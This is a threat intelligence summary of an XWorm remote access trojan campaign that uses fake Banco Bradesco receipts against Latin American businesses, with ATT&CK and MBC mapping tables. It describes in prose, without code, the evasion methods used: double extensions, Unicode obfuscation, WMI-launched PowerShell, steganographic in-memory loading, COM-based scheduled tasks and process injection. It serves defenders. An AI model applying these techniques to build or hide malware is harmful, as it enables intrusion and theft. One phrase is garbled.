EXECUTIVE SUMMARY
The campaign involves a multi-stage infection chain distributing XWorm v5.6 through banking-themed lures targeting businesses across Brazil and Latin America. The attack begins with a fake receipt referencing Banco Bradesco that uses a deceptive double extension to appear as a harmless document while executing as a Windows Script Host dropper. The file is intentionally padded with junk data to increase its size and bypass scanning engines that skip large files. Its JavaScript content is further hidden using Unicode junk injection that mixes emojis, homoglyphs, and non-ASCII characters to conceal malicious logic. During execution, a reconstruction routine removes this noise and rebuilds a concealed PowerShell command responsible for downloading the next stage. Instead of launching PowerShell through obvious execution methods, the script uses WMI to spawn it silently with hidden window attributes and a short delay designed to evade automated sandbox detection.
The second phase relies on trusted service abuse and steganography to maintain stealth. The decoded PowerShell command retrieves an image from Cloudinary so that network traffic resembles normal image downloads. The image secretly contains a Base64-encoded .NET assembly hidden between custom markers, which the script extracts and loads directly into memory using reflection. Because the payload never touches disk, traditional detection opportunities are reduced. The in-memory loader decodes an obfuscated argument revealing the final payload location and deploys a VB.NET component that establishes persistence. Rather than using visible command-line task creation, the component communicates directly with Task Scheduler COM interfaces, producing persistence entries without typical execution traces. The scheduled task re-launches the loader during logon, creating a reinfection loop that preserves modular control.
The final stage delivers the remote access trojan disguised as a text file containing a reversed Base64-encoded executable that is decoded and injected into a legitimate system binary. This living-off-the-land technique enables command and control communication while blending with trusted processes. The payload configuration is protected using weak encryption, allowing analysis to recover infrastructure details such as command endpointsy endpoints, communication parameters, installation paths, and execution identifiers. Once active, the trojan supports credential theft, session hijacking, keystroke logging, and lateral movement into email and financial environments, enabling broader compromise from a single user interaction. The persistence mechanism that repeatedly launches the loader combined with trusted process injection delays visibility of malicious activity, as early indicators resemble routine background behavior such as image downloads and hidden scripting. This delay extends response time and allows operators to expand access while preparing additional impact stages including payment fraud and ransomware deployment.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Execution | T1059.007 | Command and Scripting Interpreter | JavaScript |
| T1047 | Windows Management Instrumentation | — | |
| Persistence | T1053.005 | Scheduled Task Job | Scheduled Task |
| Defense Evasion | T1027.010 | Obfuscated Files or Information | Command Obfuscation |
| T1140 | Deobfuscate Decode Files or Information | — | |
| T1218.010 | System Binary Proxy Execution | Regsvcs Regasm | |
| T1620 | Reflective Code Loading | — | |
| Credential Access | T1555.003 | Credentials from Password Stores | Credentials from Web Browsers |
| Collection | T1056.001 | Input Capture | Keylogging |
| Command and Control | T1105 | Ingress Tool Transfer | — |
| T1071.001 | Application Layer Protocol | Web Protocols |
MBC MAPPING:
| Objective | Behaviour ID | Behaviour |
| Defense Evasion | E1027 | Obfuscated Files or Information |
| E1055 | Process Injection | |
| B0036 | Capture Evasion | |
| Execution | E1059 | Command and Scripting Interpreter |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Command and Control | B0030 | C2 Communication |
| Collection | E1560 | Archive Collected Data |
REFERENCES:
The following reports contain further technical details:
https://cybersecuritynews.com/xworm-malware-fake-financial-receipts/